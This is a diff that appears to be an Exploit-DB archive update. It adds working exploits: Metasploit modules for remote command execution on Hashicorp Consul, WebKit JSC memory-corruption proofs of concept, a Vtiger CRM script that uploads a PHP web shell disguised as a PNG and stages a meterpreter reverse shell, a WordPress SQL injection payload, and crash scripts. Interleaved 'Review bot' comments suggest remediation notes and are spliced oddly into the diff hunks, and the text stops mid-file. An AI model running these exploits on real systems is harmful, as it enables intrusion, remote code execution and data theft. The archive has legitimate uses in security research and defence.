From e8dcb9f022f05bbfcdda225038d59b87a4553575 Mon Sep 17 00:00:00 2001 
From: Offensive Security Date: Thu, 3 Jan 2019 05:01:43 +0000 Subject: [PATCH] DB: 2019-01-03 12 changes to exploits/shellcodes EZ CD Audio Converter 8.0.7 - Denial of Service (PoC) NetworkSleuth 3.0.0.0 - 'Key' Denial of Service (PoC) NBMonitor Network Bandwidth Monitor 1.6.5.0 - 'Name' Denial of Service (PoC) WebKit JSC - 'AbstractValue::set' Use-After-Free WebKit JSC - 'JSArray::shiftCountWithArrayStorage' Out-of-Bounds Read/Write Ayukov NFTP FTP Client 2.0 - Buffer Overflow Hashicorp Consul - Remote Command Execution via Rexec (Metasploit) Hashicorp Consul - Remote Command Execution via Services API (Metasploit) WordPress Plugin Adicon Server 1.2 - 'selectedPlace' SQL Injection Frog CMS 0.9.5 - Cross-Site Scripting ZeusCart 4.0 - Cross-Site Request Forgery (Deactivate Customer Accounts) WSTMart 2.0.8 - Cross-Site Scripting ZeusCart 4.0 - Cross-Site Request Forgery (Deactivate Customer Accounts) WSTMart 2.0.8 - Cross-Site Scripting FrontAccounting 2.4.5 - 'SubmitUser' SQL Injection Craft CMS 3.0.25 - Cross-Site Scripting bludit Pages Editor 3.0.0 - Arbitrary File Upload WordPress Plugin Baggage Freight Shipping Australia 0.1.0 - Arbitrary File Upload bludit Pages Editor 3.0.0 - Arbitrary File Upload WordPress Plugin Baggage Freight Shipping Australia 0.1.0 - Arbitrary File Upload Vtiger CRM 7.1.0 - Remote Code Execution --- exploits/linux/remote/46073.rb | 176 +++++++++++++++++++++++++++ exploits/linux/remote/46074.rb | 132 ++++++++++++++++++++ exploits/multiple/dos/46071.html | 106 ++++++++++++++++ exploits/multiple/dos/46072.js | 41 +++++++ exploits/php/webapps/46027.html | 2 +- exploits/php/webapps/46065.py | 149 +++++++++++++++++++++++ exploits/php/webapps/46066.txt | 18 +++ exploits/php/webapps/46067.txt | 13 ++ exploits/windows_x86-64/dos/46064.py | 25 ++++ exploits/windows_x86-64/dos/46068.py | 28 +++++ exploits/windows_x86-64/dos/46069.py | 25 ++++ exploits/windows_x86/local/46070.py | 71 +++++++++++ files_exploits.csv | 23 +++- 13 files changed, 802 
insertions(+), 7 deletions(-)
create mode 100755 exploits/linux/remote/46073.rb
create mode 100755 exploits/linux/remote/46074.rb
create mode 100644 exploits/multiple/dos/46071.html
create mode 100644 exploits/multiple/dos/46072.js
create mode 100755 exploits/php/webapps/46065.py
create mode 100644 exploits/php/webapps/46066.txt
create mode 100644 exploits/php/webapps/46067.txt
create mode 100755 exploits/windows_x86-64/dos/46064.py
create mode 100755 exploits/windows_x86-64/dos/46068.py
create mode 100755 exploits/windows_x86-64/dos/46069.py
create mode 100755 exploits/windows_x86/local/46070.py
diff --git a/exploits/linux/remote/46073.rb b/exploits/linux/remote/46073.rb
new file mode 100755
index 000000000..69cce063c
--- /dev/null
+++ b/exploits/linux/remote/46073.rb
@@ -0,0 +1,176 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Exploit::CmdStager
+
+ def initialize(info={})
+ super(update_info(info,
+ 'Name' => "Hashicorp Consul Remote Command Execution via Rexec",
+ 'Description' => %q{
+ This module exploits a feature of Hashicorp Consul named rexec.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'Bharadwaj Machiraju ', # Discovery and PoC
+ 'Francis Alexander ', # Discovery and PoC
+ 'Quentin Kaiser ' # Metasploit module
+ ],
+ 'References' =>
+ [
+ [ 'URL', 'https://www.consul.io/docs/agent/options.html#disable_remote_exec' ],
+ [ 'URL', 'https://www.consul.io/docs/commands/exec.html'],
+ [ 'URL', 'https://github.com/torque59/Garfield' ]
+ ],
+ 'Platform' => 'linux',
+ 'Targets' => [ [ 'Linux', {} ] ],
+ 'Payload' => {},
+ 'CmdStagerFlavor' => [ 'bourne', 'echo', 'printf', 'wget', 'curl' ],
+ 'Privileged' => false,
+ 'DefaultTarget' => 0,
+ 'DisclosureDate' => 'Aug 11 2018'))
+ register_options(
+ [
+ OptString.new('TARGETURI', [true, 'The base path', '/']),
+ OptBool.new('SSL', [false, 'Negotiate SSL/TLS for outgoing connections', false]),
+ OptInt.new('TIMEOUT', [false, 'The timeout to use when waiting for the command to trigger', 20]),
+ OptString.new('ACL_TOKEN', [false, 'Consul Agent ACL token', '']),
+ Opt::RPORT(8500)
+ ])
+ end
+
+ def check
+ uri = target_uri.path
+ res = send_request_cgi({
+ 'method' => 'GET',
+ 'uri' => normalize_uri(uri, "/v1/agent/self"),
+ 'headers' => {
+ 'X-Consul-Token' => datastore['ACL_TOKEN']
+ }
+ })
+ unless res
+ vprint_error 'Connection failed'
+ return CheckCode::Unknown
+ end
+ begin
+ agent_info = JSON.parse(res.body)
+ if agent_info["Config"]["DisableRemoteExec"] == false || agent_info["DebugConfig"]["DisableRemoteExec"] == false
+ return CheckCode::Vulnerable
+ else
+ return CheckCode::Safe
+ end
+ rescue JSON::ParserError
+ vprint_error 'Failed to parse JSON output.'
+ return CheckCode::Unknown
+ end
+ end
+
+ def execute_command(cmd, opts = {})
+ uri = target_uri.path
+
+ print_status('Creating session.')
+ res = send_request_cgi({
+ 'method' => 'PUT',
+ 'uri' => normalize_uri(uri, 'v1/session/create'),
+ 'headers' => {
+ 'X-Consul-Token' => datastore['ACL_TOKEN']
+ },
+ 'ctype' => 'application/json',
+ 'data' => {:Behavior => "delete", :Name => "Remote Exec", :TTL => "15s"}.to_json
+ })
+
+ if res and res.code == 200
+ begin
+ sess = JSON.parse(res.body)
+ print_status("Got rexec session ID #{sess['ID']}")
+ rescue JSON::ParseError
+ fail_with(Failure::Unknown, 'Failed to parse JSON output.')
+ end
+ end
+
+ print_status("Setting command for rexec session #{sess['ID']}")
+ res = send_request_cgi({
+ 'method' => 'PUT',
+ 'uri' => normalize_uri(uri, "v1/kv/_rexec/#{sess['ID']}/job?acquire=#{sess['ID']}"),
+ 'headers' => {
+ 'X-Consul-Token' => datastore['ACL_TOKEN']
+ },
+ 'ctype' => 'application/json',
+ 'data' => {:Command => "#{cmd}", :Wait => 2000000000}.to_json
+ })
+ if res and not res.code == 200 or res.body == 'false'
+ fail_with(Failure::Unknown, 'An error occured when contacting the Consul API.')
+ end
+
+ print_status("Triggering execution on rexec session #{sess['ID']}")
+ res = send_request_cgi({
+ 'method' => 'PUT',
+ 'uri' => normalize_uri(uri, "v1/event/fire/_rexec"),
+ 'headers' => {
+ 'X-Consul-Token' => datastore['ACL_TOKEN']
+ },
+ 'ctype' => 'application/json',
+ 'data' => {:Prefix => "_rexec", :Session => "#{sess['ID']}"}.to_json
+ })
+ if res and not res.code == 200
+ fail_with(Failure::Unknown, 'An error occured when contacting the Consul API.')
+ end
+
+ begin
+ Timeout.timeout(datastore['TIMEOUT']) do
+ res = send_request_cgi({
+ 'method' => 'GET',
+ 'uri' => normalize_uri(uri, "v1/kv/_rexec/#{sess['ID']}/?keys=&wait=2000ms"),
+ 'headers' => {
+ 'X-Consul-Token' => datastore['ACL_TOKEN']
+ }
+ })
+ begin
+ data = JSON.parse(res.body)
+ break if data.include? 'out'
+ rescue JSON::ParseError
+ fail_with(Failure::Unknown, 'Failed to parse JSON output.')
+ end
+ sleep 2
+ end
+ rescue Timeout::Error
+ # we catch this error so cleanup still happen afterwards
+ print_status("Timeout hit, error with payload ?")
+ end
+
+ print_status("Cleaning up rexec session #{sess['ID']}")
+ res = send_request_cgi({
+ 'method' => 'PUT',
+ 'uri' => normalize_uri(uri, "v1/session/destroy/#{sess['ID']}"),
+ 'headers' => {
+ 'X-Consul-Token' => datastore['ACL_TOKEN']
+ }
+ })
+
+ if res and not res.code == 200 or res.body == 'false'
+ fail_with(Failure::Unknown, 'An error occured when contacting the Consul API.')
+ end
+
+ res = send_request_cgi({
+ 'method' => 'DELETE',
+ 'uri' => normalize_uri(uri, "v1/kv/_rexec/#{sess['ID']}?recurse="),
+ 'headers' => {
+ 'X-Consul-Token' => datastore['ACL_TOKEN']
+ }
+ })
+
+ if res and not res.code == 200 or res.body == 'false'
+ fail_with(Failure::Unknown, 'An error occured when contacting the Consul API.')
+ end
+ end
+
+ def exploit
+ execute_cmdstager()
+ end
+end
\ No newline at end of file
diff --git a/exploits/linux/remote/46074.rb b/exploits/linux/remote/46074.rb
new file mode 100755
index 000000000..3f5d86cce
--- /dev/null
+++ b/exploits/linux/remote/46074.rb
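Review bot: In exploits/linux/remote/46073.rb the `'Description'` passed to `update_info` states only that the module "exploits a feature of Hashicorp Consul named rexec" and leaves out the condition that `check` itself tests, namely that the agent reports `DisableRemoteExec` as false under `Config` or `DebugConfig`. I would extend the text with `Remote exec is reachable only when the agent has disable_remote_exec set to false and the HTTP API accepts the request; setting it to true and enforcing ACL tokens on the API closes this path.` so that the exposure condition and the remediation sit next to each other. A second sentence should record that the module creates a session named "Remote Exec", writes under the `_rexec/` KV prefix and fires a `_rexec` event, since those are what an operator would look for when auditing an agent. The description in exploits/linux/remote/46074.rb has the same gap for `EnableScriptChecks` and `EnableRemoteScriptChecks`.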
@@ -0,0 +1,132 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Exploit::CmdStager
+
+ def initialize(info={})
+ super(update_info(info,
+ 'Name' => "Hashicorp Consul Remote Command Execution via Services API",
+ 'Description' => %q{
+ This module exploits Hashicorp Consul's services API to gain remote command
+ execution on Consul nodes.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'Bharadwaj Machiraju ', # Discovery and PoC
+ 'Francis Alexander ', # Discovery and PoC
+ 'Quentin Kaiser ' # Metasploit module
+ ],
+ 'References' =>
+ [
+ [ 'URL', 'https://www.consul.io/api/agent/service.html' ],
+ [ 'URL', 'https://github.com/torque59/Garfield' ]
+ ],
+ 'Platform' => 'linux',
+ 'Targets' => [ [ 'Linux', {} ] ],
+ 'Payload' => {},
+ 'CmdStagerFlavor' => [ 'bourne', 'echo', 'printf', 'curl', 'wget'],
+ 'Privileged' => false,
+ 'DefaultTarget' => 0,
+ 'DisclosureDate' => 'Aug 11 2018'))
+ register_options(
+ [
+ OptString.new('TARGETURI', [true, 'The base path', '/']),
+ OptBool.new('SSL', [false, 'Negotiate SSL/TLS for outgoing connections', false]),
+ OptString.new('ACL_TOKEN', [false, 'Consul Agent ACL token', '']),
+ Opt::RPORT(8500)
+ ])
+ end
+
+ def check
+ res = send_request_cgi({
+ 'method' => 'GET',
+ 'uri' => normalize_uri(target_uri.path, '/v1/agent/self'),
+ 'headers' => {
+ 'X-Consul-Token' => datastore['ACL_TOKEN']
+ }
+ })
+
+ unless res
+ vprint_error 'Connection failed'
+ return CheckCode::Unknown
+ end
+
+ unless res.code == 200
+ vprint_error 'Unexpected reply'
+ return CheckCode::Safe
+ end
+
+ agent_info = JSON.parse(res.body)
+
+ if agent_info["Config"]["EnableScriptChecks"] == true || agent_info["DebugConfig"]["EnableScriptChecks"] == true || agent_info["DebugConfig"]["EnableRemoteScriptChecks"] == true
+ return CheckCode::Vulnerable
+ end
+
+ CheckCode::Safe
+ rescue JSON::ParserError
+ vprint_error 'Failed to parse JSON output.'
+ return CheckCode::Unknown
+ end
+
+ def execute_command(cmd, opts = {})
+ uri = target_uri.path
+ service_name = Rex::Text.rand_text_alpha(5..10)
+ print_status("Creating service '#{service_name}'")
+
+ # NOTE: Timeout defines how much time the check script will run until
+ # getting killed. Arbitrarily set to one day for now.
+ res = send_request_cgi({
+ 'method' => 'PUT',
+ 'uri' => normalize_uri(uri, 'v1/agent/service/register'),
+ 'headers' => {
+ 'X-Consul-Token' => datastore['ACL_TOKEN']
+ },
+ 'ctype' => 'application/json',
+ 'data' => {
+ :ID => "#{service_name}",
+ :Name => "#{service_name}",
+ :Address => "127.0.0.1",
+ :Port => 80,
+ :check => {
+ :script => "#{cmd}",
+ :Args => ["sh", "-c", "#{cmd}"],
+ :interval => "10s",
+ :Timeout => "86400s"
+ }
+ }.to_json
+ })
+ unless res && res.code == 200
+ fail_with(Failure::UnexpectedReply, 'An error occured when contacting the Consul API.')
+ end
+ print_status("Service '#{service_name}' successfully created.")
+ print_status("Waiting for service '#{service_name}' script to trigger")
+ sleep(12)
+ print_status("Removing service '#{service_name}'")
+ res = send_request_cgi({
+ 'method' => 'PUT',
+ 'uri' => normalize_uri(
+ uri,
+ "v1/agent/service/deregister/#{service_name}"
+ ),
+ 'headers' => {
+ 'X-Consul-Token' => datastore['ACL_TOKEN']
+ }
+ })
+ if res && res.code != 200
+ fail_with(Failure::UnexpectedReply,
+ 'An error occured when contacting the Consul API.'
+ )
+ end
+ end
+
+ def exploit
+ execute_cmdstager()
+ end
+end
\ No newline at end of file
diff --git a/exploits/multiple/dos/46071.html b/exploits/multiple/dos/46071.html
new file mode 100644
index 000000000..0df9466db
--- /dev/null
+++ b/exploits/multiple/dos/46071.html
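Review bot: In `execute_command` of exploits/linux/remote/46074.rb the deregistration result is tested with `if res && res.code != 200`, so a request that gets no response at all passes as success, while the registration a few lines earlier uses the stricter `unless res && res.code == 200`. The registered check carries `:interval => "10s"` and `:Timeout => "86400s"`, so a cleanup that silently failed leaves a service with a script check behind on the tested agent. I would use the same guard for both calls, `unless res && res.code == 200`, and put `service_name` into the failure message so that the leftover entry can be found and removed by hand.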
@@ -0,0 +1,106 @@ + + +// ./jsc --useConcurrentJIT=false ~/test.js + +function set(arr, value) { + arr[0] = value; +} + +function getImmutableArrayOrSet(get, value) { + let arr = [1]; + if (get) + return arr; + + set(arr, value); // This inlinee is for having checkArray not take the paths using the structure comparison. + set({}, 1); +} + +function main() { + getImmutableArrayOrSet(true); + + for (let i = 0; i < 100; i++) { + getImmutableArrayOrSet(false, {}); + } + + let arr = getImmutableArrayOrSet(true); + print(arr[0] === 1); +} + +main(); + +PoC 2 (UaF): + \ No newline at end of file diff --git a/exploits/multiple/dos/46072.js b/exploits/multiple/dos/46072.js new file mode 100644 index 000000000..63ace8690 --- /dev/null +++ b/exploits/multiple/dos/46072.js 
@@ -0,0 +1,41 @@ +/* +bool JSArray::shiftCountWithArrayStorage(VM& vm, unsigned startIndex, unsigned count, ArrayStorage* storage) +{ + unsigned oldLength = storage->length(); + RELEASE_ASSERT(count <= oldLength); + + // If the array contains holes or is otherwise in an abnormal state, + // use the generic algorithm in ArrayPrototype. + if ((storage->hasHoles() && this->structure(vm)->holesMustForwardToPrototype(vm, this)) + || hasSparseMap() + || shouldUseSlowPut(indexingType())) { + return false; + } + + if (!oldLength) + return true; + + unsigned length = oldLength - count; + + storage->m_numValuesInVector -= count; + storage->setLength(length); + + +Considering the comment, I think the method is supposed to prevent an array with holes from going through to the code "storage->m_numValuesInVector -= count". But that kind of arrays actually can get there by only having the holesMustForwardToPrototype method return false. Unless the array has any indexed accessors on it or Proxy objects in the prototype chain, the method will just return false. So "storage->m_numValuesInVector" can be controlled by the user. + +In the PoC, it changes m_numValuesInVector to 0xfffffff0 that equals to the new length, making the hasHoles method return false, leading to OOB reads/writes in the JSArray::unshiftCountWithArrayStorage method. + +PoC: +*/ + +function main() { + let arr = [1]; + + arr.length = 0x100000; + arr.splice(0, 0x11); + + arr.length = 0xfffffff0; + arr.splice(0xfffffff0, 0, 1); +} + +main(); \ No newline at end of file diff --git a/exploits/php/webapps/46027.html b/exploits/php/webapps/46027.html index 6e7d8fceb..7426fc0b2 100644 --- a/exploits/php/webapps/46027.html +++ b/exploits/php/webapps/46027.html @@ -1,4 +1,4 @@ -# Exploit Title: ZeusCart4.0 Deactivate Customer Accounts CSRF +# Exploit Title: ZeusCart 4.0 Deactivate Customer Accounts CSRF # Date: 12/20/2018 # Exploit Author: mqt # Vendor Homepage: http://http://www.zeuscart.com/ 
diff --git a/exploits/php/webapps/46065.py b/exploits/php/webapps/46065.py new file mode 100755 index 000000000..7443ea2b6 --- /dev/null +++ b/exploits/php/webapps/46065.py 
@@ -0,0 +1,149 @@ +# Exploit Title: Vtiger CRM 7.1.0 - Remote Code Execution +# Date: 2018-12-27 +# Exploit Author: Özkan Mustafa Akkuş (AkkuS) +# Contact: https://pentest.com.tr +# Vendor Homepage: https://www.vtiger.com +# Software Link: https://sourceforge.net/projects/vtigercrm/files/latest/download +# Version: v7.1.0 +# Category: Webapps +# Tested on: XAMPP for Linux 5.6.38-0 +# Software Description : Vtiger CRM enables sales, support, and marketing teams to +# organize and collaborate to measurably improve customer experiences and business outcomes. + +# Description : This application has the vulnerability of uploading files with the extension "php3" in the logo upload field. +# But the uploaded file must be in PNG format and size 150X40. +# We can put PHP code into image source. After you make the extension "php3", the PHP code that we've placed can work. +# Therefore, PHP code can be executed using "" Tags in PNG format file. +# ================================================================== +# I have exploited in 2 different ways. +# First one uploads a basic php shell for you and lets you control it through the console. +# Second one uploads the php meterpreter payload to the target site and lets you set this payload. 
+ +# PoC: + +#!/usr/bin/python + +import mechanize, sys, cookielib, requests +import colorama, urllib, re, random +from colorama import Fore + +def bannerche(): + print ''' + @-------------------------------------------------------------@ + | Vtiger CRM 7.1.0 - Remote Code Execution Exploit | + | Vulnerability discovered by AkkuS | + | My Blog - https://pentest.com.tr | + @-------------------------------------------------------------@ + ''' +bannerche() + +if (len(sys.argv) != 2): + print "[*] Usage: poc.py " + exit(0) + +rhost = sys.argv[1] +UserName = str(raw_input("User Name: ")) # Administrator Username Input +Password = str(raw_input("Password: ")) # Administrator Password Input + +print(Fore.BLUE + "+ [*] Loging in...") +br = mechanize.Browser() # set cookies +br.set_handle_robots(False) +cj = cookielib.LWPCookieJar() +br.set_cookiejar(cj) + +br.open("http://"+rhost+"/") # User Access Login +assert br.viewing_html() +br.select_form(nr=0) +br.form['username'] = UserName +br.form['password'] = Password +br.submit() + +title = br.title() +if title == "Dashboard": # Access control + print (Fore.YELLOW + "+ [*] You're in "+title+" section of the app now") + print (Fore.GREEN + "+ [*] Login successful") +else: + print (Fore.RED + "+ [*] User information is incorrect.") + sys.exit() +## +# Introducing Cookie and CSRF token information +## +check = requests.get("http://"+rhost+"/index.php?module=Vtiger&parent=Settings&view=CompanyDetails&block=8&fieldid=14", cookies=cj) + +doc = check.text + +finder = re.findall(r'csrfMagicToken = ".*";', doc) +csrf = finder[0].replace('csrfMagicToken = ', '').replace('"','').replace(';var csrfMagicName = __vtrftk;','').strip() +csrf_to_data = str(csrf) +print(Fore.YELLOW + "+ [*] Token = " + csrf_to_data) + +x = br._ua_handlers['_cookies'].cookiejar +c = str(x) + +sonuc = re.findall(r"([a-fA-F\d]{32})", c) +g = sonuc[0] +v = str(g) +print (Fore.YELLOW + "+ [*] PHPSESSID = " + v) +## +# Random value fetching +## + +boundary = 
''.join(str(random.randint(0,9)) for _ in xrange(29)) +filename = ''.join(random.choice('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789') for i in range(10)) + ".php3" + +## +# EXPLOIT +## +post_cookie = {"PHPSESSID": v} +post_headers = {"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", + "Accept-Language": "en-US,en;q=0.5", + "Connection": "close", + "Content-Type": "multipart/form-data; boundary=---------------------------"+boundary+""} +Basic_data = "-----------------------------"+boundary+"\r\nContent-Disposition: form-data; name=\"__vtrftk\"\r\n\r\n"+csrf_to_data+"\r\n-----------------------------"+boundary+"\r\nContent-Disposition: form-data; name=\"module\"\r\n\r\nVtiger\r\n-----------------------------"+boundary+"\r\nContent-Disposition: form-data; name=\"parent\"\r\n\r\nSettings\r\n-----------------------------"+boundary+"\r\nContent-Disposition: form-data; name=\"action\"\r\n\r\nCompanyDetailsSave\r\n-----------------------------"+boundary+"\r\nContent-Disposition: form-data; name=\"logo\"; filename=\""+filename+"\"\r\nContent-Type: image/png\r\n\r\n\x89PNG\r\n\x1a\n\x00\x00\x00\rIHDR\x00\x00\x00 \x00\x00\x00 \x08\x02\x00\x00\x00\xfc\x18\xed\xa3\x00\x00\x00\tpHYs\x00\x00\x0e\xc4\x00\x00\x0e\xc4\x01\x95+\x0e\x1b\x00\x00\x00`IDATH\x89c\\\"; $cmd = ($_REQUEST['cmd']); system($cmd); echo \"\"; die; }?>X\x80\x81\x81\xc1s^7\x93\xfc\x8f\x8b\xdb~_\xd3}\xaa'\xf7\xf1\xe3\xc9\xbf_\xef\x06|\xb200c\xd9\xb9g\xfd\xd9=\x1b\xce2\x8c\x82Q0\nF\xc1(\x18\x05\xa3`\x14\x8c\x82Q0\n\x86\r\x00\x00\x81\xb2\x1b\x02\x07x\r\x0c\x00\x00\x00\x00IEND\xaeB`\x82\r\n-----------------------------"+boundary+"\r\nContent-Disposition: form-data; name=\"organizationname\"\r\n\r\nvtiger\r\n-----------------------------"+boundary+"\r\nContent-Disposition: form-data; name=\"address\"\r\n\r\n95, 12th Main Road, 3rd Block, Rajajinagar\r\n-----------------------------"+boundary+"\r\nContent-Disposition: form-data; 
name=\"city\"\r\n\r\nBangalore\r\n-----------------------------"+boundary+"\r\nContent-Disposition: form-data; name=\"state\"\r\n\r\nKarnataka\r\n-----------------------------"+boundary+"\r\nContent-Disposition: form-data; name=\"code\"\r\n\r\n560010\r\n-----------------------------"+boundary+"\r\nContent-Disposition: form-data; name=\"country\"\r\n\r\nIndia\r\n-----------------------------"+boundary+"\r\nContent-Disposition: form-data; name=\"phone\"\r\n\r\n+91 9243602352\r\n-----------------------------"+boundary+"\r\nContent-Disposition: form-data; name=\"fax\"\r\n\r\n+91 9243602352\r\n-----------------------------"+boundary+"\r\nContent-Disposition: form-data; name=\"website\"\r\n\r\nwww.vtiger.com\r\n-----------------------------"+boundary+"\r\nContent-Disposition: form-data; name=\"vatid\"\r\n\r\n\r\n-----------------------------"+boundary+"--\r\n" + +print (Fore.BLUE + "+ [*] Select shell type:") +print (Fore.YELLOW +"- [*] 1 - Basic Shell") +print ("- [*] 2 - Meterpreter Shell") +choose = int(raw_input("- [*] Enter a number (1 or 2) : ")) + +if choose == 1: + Basic = requests.post("http://"+rhost+"/index.php", headers=post_headers, cookies=post_cookie, data=Basic_data) + if Basic.status_code == 200: + print (Fore.GREEN + "+ [*] Shell successfully uploaded!") + print (Fore.GREEN + "+ [*] Shell Directory = http://"+rhost+"/test/logo/"+filename+"?cmd=[Command Here]") + while True: + shellctrl = requests.get("http://"+rhost+"/test/logo/"+filename+"") + if shellctrl.status_code == 200: + Command = str(raw_input(Fore.WHITE + "shell> ")) + URL = requests.get("http://"+rhost+"/test/logo/"+filename+"?cmd="+Command+"") + print URL.text + else: + print (Fore.RED + "+ [X] Unable to upload or access the shell") + sys.exit() + +elif choose == 2: + print("+ [*] In this option, you must listen to LHOST and LPORT with your Metasploit.") + print(Fore.RED + "+ [*] You should use the "+Fore.WHITE +"php/meterpreter/reverse_tcp"+Fore.RED +" payload") + print(Fore.YELLOW + "+ [*] 
Enter metasploit handler settings.") + + lhost = str(raw_input(Fore.WHITE + "LHOST : ")) + lport = str(raw_input(Fore.WHITE + "LPORT : ")) + + Meter_data = "-----------------------------"+boundary+"\r\nContent-Disposition: form-data; name=\"__vtrftk\"\r\n\r\n"+csrf_to_data+"\r\n-----------------------------"+boundary+"\r\nContent-Disposition: form-data; name=\"module\"\r\n\r\nVtiger\r\n-----------------------------"+boundary+"\r\nContent-Disposition: form-data; name=\"parent\"\r\n\r\nSettings\r\n-----------------------------"+boundary+"\r\nContent-Disposition: form-data; name=\"action\"\r\n\r\nCompanyDetailsSave\r\n-----------------------------"+boundary+"\r\nContent-Disposition: form-data; name=\"logo\"; filename=\""+filename+"\"\r\nContent-Type: image/png\r\n\r\n\x89PNG\r\n\x1a\n\x00\x00\x00\rIHDR\x00\x00\x00 \x00\x00\x00 \x08\x02\x00\x00\x00\xfc\x18\xed\xa3\x00\x00\x00\tpHYs\x00\x00\x0e\xc4\x00\x00\x0e\xc4\x01\x95+\x0e\x1b\x00\x00\x00`IDATH\x89c\\X\x80\x81\x81\xc1s^7\x93\xfc\x8f\x8b\xdb~_\xd3}\xaa'\xf7\xf1\xe3\xc9\xbf_\xef\x06|\xb200c\xd9\xb9g\xfd\xd9=\x1b\xce2\x8c\x82Q0\nF\xc1(\x18\x05\xa3`\x14\x8c\x82Q0\n\x86\r\x00\x00\x81\xb2\x1b\x02\x07x\r\x0c\x00\x00\x00\x00IEND\xaeB`\x82\r\n-----------------------------"+boundary+"\r\nContent-Disposition: form-data; name=\"organizationname\"\r\n\r\nvtiger\r\n-----------------------------"+boundary+"\r\nContent-Disposition: form-data; name=\"address\"\r\n\r\n95, 12th Main Road, 3rd Block, Rajajinagar\r\n-----------------------------"+boundary+"\r\nContent-Disposition: form-data; name=\"city\"\r\n\r\nBangalore\r\n-----------------------------"+boundary+"\r\nContent-Disposition: form-data; name=\"state\"\r\n\r\nKarnataka\r\n-----------------------------"+boundary+"\r\nContent-Disposition: form-data; name=\"code\"\r\n\r\n560010\r\n-----------------------------"+boundary+"\r\nContent-Disposition: form-data; name=\"country\"\r\n\r\nIndia\r\n-----------------------------"+boundary+"\r\nContent-Disposition: form-data; 
name=\"phone\"\r\n\r\n+91 9243602352\r\n-----------------------------"+boundary+"\r\nContent-Disposition: form-data; name=\"fax\"\r\n\r\n+91 9243602352\r\n-----------------------------"+boundary+"\r\nContent-Disposition: form-data; name=\"website\"\r\n\r\nwww.vtiger.com\r\n-----------------------------"+boundary+"\r\nContent-Disposition: form-data; name=\"vatid\"\r\n\r\n\r\n-----------------------------"+boundary+"--\r\n" + + Basic = requests.post("http://"+rhost+"/index.php", headers=post_headers, cookies=post_cookie, data=Meter_data) + while True: + payload = requests.get("http://"+rhost+"/test/logo/"+filename+"") + print("+ [*] Check your Metasploit Framework console") + if payload.status_code == 200: + print (Fore.GREEN + "+ [*] Payload uploaded and executed!") + + else: + print (Fore.RED + "+ [X] Unable to upload and run the payload") + sys.exit() +else: + print("Invalid input!") +# end + + +vtiger0.png \ No newline at end of file diff --git a/exploits/php/webapps/46066.txt b/exploits/php/webapps/46066.txt new file mode 100644 index 000000000..13b2a252d --- /dev/null +++ b/exploits/php/webapps/46066.txt @@ -0,0 +1,18 @@ +# Exploit Title: WordPress Plugin Adicon Server 1.2 - 'selectedPlace' SQL Injection +# Date: 2018-12-28 +# Software Link: https://wordpress.org/plugins/adicons/ +# Exploit Author: Kaimi +# Website: https://kaimi.io +# Version: 1.2 +# Category: webapps + +# SQL Injection +# File: addIcon.php +# Vulnerable code: +# $placement=$_POST['selectedPlace']; + +# $x=explode("_",$placement); +# $ck=$wpdb->get_row("select id from ".$table_prefix."adicons where adRow=".$x[0]." and adCol=".$x[1]); + +# Example payload: +selectedPlace=1 AND (SELECT * FROM (SELECT(SLEEP(1)))abcD); -- - \ No newline at end of file diff --git a/exploits/php/webapps/46067.txt b/exploits/php/webapps/46067.txt new file mode 100644 index 000000000..5fe5ee189 --- /dev/null +++ b/exploits/php/webapps/46067.txt 
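Review bot: `Password = str(raw_input("Password: "))` in exploits/php/webapps/46065.py echoes the administrator password to the terminal, and the script later prints the CSRF token and the session id (`"+ [*] PHPSESSID = " + v`), so all three end up in scrollback and in any recorded session. Reading the password with `getpass.getpass("Password: ")` (after `import getpass`) and masking or dropping the two `print` lines keeps live credentials of the tested system out of logs. Every request is also built on a literal `"http://"+rhost`, so the login and the cookie travel unencrypted; that deserves a comment at the top of the script at least.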
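Review bot: The entry in exploits/php/webapps/46066.txt quotes the vulnerable query from addIcon.php, where `$x[0]` and `$x[1]` derived from `$_POST['selectedPlace']` are concatenated into the string given to `$wpdb->get_row`, but it stops short of naming the fix. A line such as `# Fix: cast both parts with intval() or pass the query through $wpdb->prepare() with %d placeholders` after the vulnerable code would make the write-up usable by site owners and the plugin author as well. The header gives no fixed version, so whether a patched release exists cannot be told from this entry.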
@@ -0,0 +1,13 @@ +# Exploit Title: Frog CMS 0.9.5 - Cross-Site Scripting +# Date: 2018-12-25 +# Exploit Author:WangDudu +# Vendor Homepage: https://github.com/philippe/FrogCMS +# Software Link: https://github.com/philippe/FrogCMS +# Version:0.9.5 +# CVE :CVE-2018-20448 + +# The parameter under /install/index.php is that the Database name has reflective XSS +# 1 The Database name , username and password must be correct +# 2 You can use the exp: + + \ No newline at end of file diff --git a/exploits/windows_x86-64/dos/46064.py b/exploits/windows_x86-64/dos/46064.py new file mode 100755 index 000000000..a5ef3b1ee --- /dev/null +++ b/exploits/windows_x86-64/dos/46064.py @@ -0,0 +1,25 @@ +# Exploit Title: NBMonitor Network Bandwidth Monitor 1.6.5.0 - 'Name' Denial of Service (PoC) +# Author: Luis Martinez +# Date: 2018-12-27 +# Vendor Homepage: www.nsauditor.com +# Software Link : http://www.nbmonitor.com/downloads/nbmonitor_setup.exe +# Tested Version: 1.6.5.0 +# Vulnerability Type: Denial of Service (DoS) Local +# Tested on OS: Windows 10 Pro x64 es + +# Steps to Produce the Crash: +# 1.- Run python code : python NBMonitor_1.6.5.0.py +# 2.- Open NBMonitor_1.6.5.0.txt and copy content to clipboard +# 3.- Open NBMonitor +# 4.- Register -> Enter Registration Code +# 5.- Paste ClipBoard on "Name:" +# 6.- Key: -> 1 +# 7.- OK +# 8.- Crashed + +#!/usr/bin/env python + +buffer = "\x41" * 276 +f = open ("NBMonitor_1.6.5.0.txt", "w") +f.write(buffer) +f.close() \ No newline at end of file diff --git a/exploits/windows_x86-64/dos/46068.py b/exploits/windows_x86-64/dos/46068.py new file mode 100755 index 000000000..2b07de399 --- /dev/null +++ 